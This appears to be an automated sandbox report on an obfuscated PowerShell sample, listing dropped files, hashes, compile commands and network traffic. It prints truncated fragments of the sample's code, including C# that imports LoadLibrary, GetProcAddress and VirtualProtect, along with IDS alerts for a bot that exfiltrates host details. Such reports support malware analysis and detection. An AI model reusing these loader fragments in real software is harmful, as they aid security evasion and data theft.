                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qycorgqd.mar.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vzfniti1.drg.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvbhzanb.vnz.psm1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                  C:\Users\user\AppData\Local\Temp\s4dvafav\CSC36361158E42F4D2FBFD4DCE2A4FFFFB.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.0905916708503036
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry1ak7Ynqq5PN5Dlq5J:+RI+ycuZhNHakS5PNnqX
                                                                                  MD5:6E0E27F94368A5A80BF9EE6E66439FB3
                                                                                  SHA1:2605359C96A07C6901EEFC64D289778ED348B96E
                                                                                  SHA-256:FDCA1D5E28A87FADBC581730CD435D18313902000479A2A16FB1C3DF53274D43
                                                                                  SHA-512:77A1FA759ADFA7965CD9C804BD14AAC4CEF0765328E6F23B474A84479DBA76CDB379EA8D8BFA0FCEA1946B8D85A26B2FE3AC681228E428AD66E09EBE0B5D3F14
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...s.4.d.v.a.f.a.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...s.4.d.v.a.f.a.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):1140
                                                                                  Entropy (8bit):4.751587839856729
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                  MD5:FE35992F552A2057291C867108A5C2EB
                                                                                  SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                  SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                  SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                                  C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):367
                                                                                  Entropy (8bit):5.193694041232788
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fIIozxs7+AEszIqLTwi23fIIl:p37Lvkmb6KbwZAIoWZEmwZAIl
                                                                                  MD5:721CC2D194B32C6D119A70CEA96BA42D
                                                                                  SHA1:5E529ACC8CA876B9017C9D1E11484F4B87599805
                                                                                  SHA-256:832E62939FEF0E096A2F01780B575EB4B7D90E9D5F11F173253AC41CE1CC6EC0
                                                                                  SHA-512:49C56F4FAB33C521B2394FD3AF14B42331F16ED97859CDAF82C856BB8A3C602C59AE971B662AD6FCD2F3747FFFF409D69C31547CB0EC9F767A95630563389EF4
                                                                                  Malicious:false
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):2.977079682240423
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6PpLNvhfeRPBFLNKhSJFCXumwYxvV1ulHa37q:gJhfeR5dBuGFK
                                                                                  MD5:CAD3B874AAF7F44EC7651DEA93278B00
                                                                                  SHA1:C06B8107C455D96179352A2A497359DC21ADB4F4
                                                                                  SHA-256:141AE0A2FE76DE08B958FF3AD1EBF45A1821EF2667E011BB6B6DF2F15BBFAB08
                                                                                  SHA-512:3448B0986D13E71E6DF68A98E3BC761FFAC31ACB37DFBE73D6AC1E89DB4BC62629EA06EFB3854A08CFB24BB1EDBB62C1EDEB02D93B85CAF93D771A36538B39CA
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                                  C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.out

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.29299984145892
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:K8Id3ka6KbwZF5EmwZFAKax5DqBVKVrdFAMBJTH:Hkka6CwZ/EmwZSK2DcVKdBJj
                                                                                  MD5:FC36BE8F47582C8CC937138439C0ED70
                                                                                  SHA1:5CFDA66809905525A2A5E7C494B4C6B56CA5DED4
                                                                                  SHA-256:8C40EB5CFBC1D12401A078220B42EDDF29535AB889991E572082FCAEB4A7C7E8
                                                                                  SHA-512:1102DB93C207EB9940BA1E3FA103F5EFA4619CB507852A66B4A14E1D0EAFF186299ADCDF87C33647BAA9965EB2CFC970AECE26841AE293DAFFF4665D275C39CC
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\s4dvafav\s4dvafav.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\thvmfbzv\CSC2C6CB80D24664034BBA8B61A4D73B8EB.TMP

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:MSVC .res
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):3.111307976128935
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry0Mak7YnqqFBPN5Dlq5J:+RI+ycuZhNdakS7PNnqX
                                                                                  MD5:CA1BB91EEC802857C84827459A911A71
                                                                                  SHA1:82D5B63265EDB9667FDBF776E0D04A865BCD2315
                                                                                  SHA-256:6805C8BB9CAD5DA5D9E06C071846E46FA618D76B1103FDDE8D0000CC376F68C2
                                                                                  SHA-512:5ED5BA3E132DDF7CC94190247580192A46B124038CD7312D2400E56D2E69FD3632D20C173C34C056A3E94F1012DDCFAFF965097B078388B9DC3F5AB0773012B0
                                                                                  Malicious:false
                                                                                  Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...t.h.v.m.f.b.z.v...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...t.h.v.m.f.b.z.v...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                  C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.0.cs

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text
                                                                                  Category:dropped
                                                                                  Size (bytes):1140
                                                                                  Entropy (8bit):4.751587839856729
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:JjajwGHNw7+qFhL/+PS+oXG4mnF1D7ZTHtws4bx:JjaEGHNw7+Ib+6+oXZIF17Zrtws4bx
                                                                                  MD5:FE35992F552A2057291C867108A5C2EB
                                                                                  SHA1:3359CC35D11E68B353BBF06D03F1A9937E2689EE
                                                                                  SHA-256:C6CD29B3B2981C29538DEB9B4445A10EC4993E93F058621F49E6AE294B4B6D1F
                                                                                  SHA-512:8E639DB3A4696FFD380C495CF816B2571656D51AEA0B3DA75FBFC7151F1DE704FE1508FF61C95FC2AC2EF230FD6FEE48536C074D71F025675103B737128E9DFF
                                                                                  Malicious:false
                                                                                  Preview:.using System;.using System.Runtime.InteropServices;..public class MyUtilityClass {. // Renamed class for clarity.. // Additional variables. private const string Kernel32Library = "kernel32";. . // Function declarations. [DllImport(Kernel32Library)]. public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);.. [DllImport(Kernel32Library)]. public static extern IntPtr LoadLibrary(string name);.. [DllImport(Kernel32Library)]. public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect);.. // Additional method for clarity. public static IntPtr LoadLibraryAndGetProcAddress(string libraryName, string procName) {. IntPtr hModule = LoadLibrary(libraryName);. if (hModule == IntPtr.Zero) {. throw new Exception("Failed to load library: " + libraryName);. }.. IntPtr procAddress = GetProcAddress(hModule, procName);. if (procAddress == In

                                                                                  C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.cmdline

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (364), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):367
                                                                                  Entropy (8bit):5.243034898824678
                                                                                  Encrypted:false
                                                                                  SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2qLTwi23fydoazxs7+AEszIqLTwi23fydoUA:p37Lvkmb6KbwZYxWZEmwZY8
                                                                                  MD5:B7FEEBFDF5035940A5D1DD8F9B2A7CEE
                                                                                  SHA1:34C5C44D09E423BD368046570DAB806698D611E3
                                                                                  SHA-256:31F775B2AE2C5824D5DDB47D7736A443FCE7FDB58FC707F8B581AE9AE42CBDA8
                                                                                  SHA-512:46A2A77A6CE0F0B8740E72CE6ADA654844625A5C27A9A389ED7F2D69EC1781F5395DD88BA8468E2CADE86B96D1ABDD8B091746099C6A62F1E55A32C00B574140
                                                                                  Malicious:true
                                                                                  Preview:./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.0.cs"

                                                                                  C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll

                                                                                  Download File
                                                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):4096
                                                                                  Entropy (8bit):2.984514123317771
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:6jpLNvhfeRPBFLRKhSJlCXumwPvV1ulda3xq:EJhfeR5dVjGfK
                                                                                  MD5:CBA6E41A84F3849DF02DFD04F441AC6B
                                                                                  SHA1:1B90C94AEE60D738BD0BD1A52B446920D2CA5754
                                                                                  SHA-256:D16EEB85D524F9006E1BF0E802B3A8B7EEE2E78C658B6157E2ACB035E5EE5B72
                                                                                  SHA-512:B7FE91E0190B1BAD4139BD944C45D53097A89D1B59B5413C9F0145D845F6A512BF0D94DEFBD2AE9A3E6935D984CD7A11C10E18FA8E404EC5EE9729F6E2724960
                                                                                  Malicious:false
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g...........!.................%... ...@....... ....................................@..................................%..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ...............................................................0..M........(......~....(....,.r...p.(....s....z..(......~....(....,.r3..p.(....s....z.*..(....*...BSJB............v4.0.30319......l.......#~..$.......#Strings........x...#US.d.......#GUID...t.......#Blob...........W.........%3........................................................................6./.........5.....U.....|......./...../...../.............................Q.=.......... M............ \.$...

                                                                                  C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.out

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.313386652069536
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:K8Id3ka6KbwZYGEmwZYpKax5DqBVKVrdFAMBJTH:Hkka6CwZ/EmwZSK2DcVKdBJj
                                                                                  MD5:A13A2C4BBC9BAC39298E0D4AFC1477F7
                                                                                  SHA1:4F77315A9CA03C06482AE0B6DE46C3C20D6F259D
                                                                                  SHA-256:34992F6ABC67584AE3216DF752ECD190937DBA6E53B28E53D418188CE0019E36
                                                                                  SHA-512:9FACE7D65DB3CD0C56F806B79B117BF8B2D0DD608B7CF7D57086C8C86F3C88D038670F9BF8C27783B54072A2428CB5EAF2D87F20E306BC97A4AD8C179A225297
                                                                                  Malicious:false
                                                                                  Preview:.C:\Users\user\Desktop> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\thvmfbzv\thvmfbzv.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6220
                                                                                  Entropy (8bit):3.7134847035290774
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:GlM4RC2QLgkvhkvCCtKjMa6gkvHNjMa6gkIHP:GlM4z0sKjMXjMI
                                                                                  MD5:82D7828E77510DA029E09C428455ACAC
                                                                                  SHA1:0F3F18D50BD47D4801A22EDF07F8336389CE54D4
                                                                                  SHA-256:CC6E5FB26AA3A543687DEE4371E1135264037E13DE2B1AC3546741D52A9292C2
                                                                                  SHA-512:3CB240929DFBDE7D761C73221EFFE70686A4A66599E4781791481E0B8576B98602BE67701E7BE2BB211D6F3FE2612EC27D40ED8CEA212795AAC027688B3F4260
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ....'GDj...t./.....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...6N.....9.Q.........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGOY.n..........................=...A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......EWsGOY.n...........................T..R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsGOY.n..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsGOY.n...........................h..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsGOY.n....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsGOY.n....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGOY.n................

                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\LKNZ9AL0DMOBQU4L3SHM.temp

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):6220
                                                                                  Entropy (8bit):3.7134847035290774
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:GlM4RC2QLgkvhkvCCtKjMa6gkvHNjMa6gkIHP:GlM4z0sKjMXjMI
                                                                                  MD5:82D7828E77510DA029E09C428455ACAC
                                                                                  SHA1:0F3F18D50BD47D4801A22EDF07F8336389CE54D4
                                                                                  SHA-256:CC6E5FB26AA3A543687DEE4371E1135264037E13DE2B1AC3546741D52A9292C2
                                                                                  SHA-512:3CB240929DFBDE7D761C73221EFFE70686A4A66599E4781791481E0B8576B98602BE67701E7BE2BB211D6F3FE2612EC27D40ED8CEA212795AAC027688B3F4260
                                                                                  Malicious:false
                                                                                  Preview:...................................FL..................F.".. ....'GDj...t./.....z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...6N.....9.Q.........t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGOY.n..........................=...A.p.p.D.a.t.a...B.V.1.....OY.n..Roaming.@......EWsGOY.n...........................T..R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsGOY.n..........................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsGOY.n...........................h..W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsGOY.n....................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsGOY.n....................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGOY.n................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:ASCII text, with very long lines (17986)
                                                                                  Entropy (8bit):3.6458393071035915
                                                                                  TrID:
                                                                                    File name:cr_asm_hiddenz.ps1
                                                                                    File size:25'712 bytes
                                                                                    MD5:5ed9d262e083f101c1467ee317c1bc35
                                                                                    SHA1:b4e9654be8db562cb78fb6c7a7ddc37579205d50
                                                                                    SHA256:7282328d8678600716a8496a2036f00c5b5721a82ffab07998554cf2fad037f3
                                                                                    SHA512:fdf82465e00a438c910f958a9272709b8ed6b63eeea5a6557679c57feec9bba8e2cbf7e944a11277c91ddb8f1078524df674c2bdacf7b09a9add663924932997
                                                                                    SSDEEP:192:bDy2fNXj5GA+uHoM7hMFwpFshbwqUdMg2I:bDy2fNXj5GA+i6Vb3UanI
                                                                                    TLSH:33B245F5B318549FBAC7AF9CC3455252D26DD13123E0594BFBAD881AEACAC535030B2E
                                                                                    File Content Preview:$bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79

                                                                                    File Icon

                                                                                    Icon Hash:3270d6baae77db44

                                                                                    Network Behavior

                                                                                    Suricata IDS Alerts

                                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                    2024-10-15T15:54:04.138632+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.949712162.159.138.232443TCP
                                                                                    2024-10-15T15:54:18.466022+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.949722162.159.138.232443TCP
                                                                                    2024-10-15T15:54:25.976667+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.949723162.159.138.232443TCP
                                                                                    2024-10-15T15:54:33.914799+02002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.949725104.20.3.235443TCP

                                                                                    Network Port Distribution

                                                                                    TCP Packets

                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 15, 2024 15:54:01.712985992 CEST4971080192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:01.717904091 CEST8049710172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:01.718082905 CEST4971080192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:01.722667933 CEST4971080192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:01.727611065 CEST8049710172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:02.324925900 CEST8049710172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:02.328336954 CEST49711443192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:02.328380108 CEST44349711172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:02.328442097 CEST49711443192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:02.339555025 CEST49711443192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:02.339595079 CEST44349711172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:02.374155045 CEST4971080192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:02.967880964 CEST44349711172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:02.967957973 CEST49711443192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:03.024398088 CEST49711443192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:03.024431944 CEST44349711172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.024894953 CEST44349711172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.031703949 CEST49711443192.168.2.9172.67.19.24
                                                                                    Oct 15, 2024 15:54:03.075408936 CEST44349711172.67.19.24192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.092164040 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.092212915 CEST44349712162.159.138.232192.168.2.9
                                                                                    Oct 15, 2024 15:54:03.092271090 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.095091105 CEST49712443192.168.2.9162.159.138.232
                                                                                    Oct 15, 2024 15:54:03.095108032 CEST44349712162.159.138.232192.168.2.9
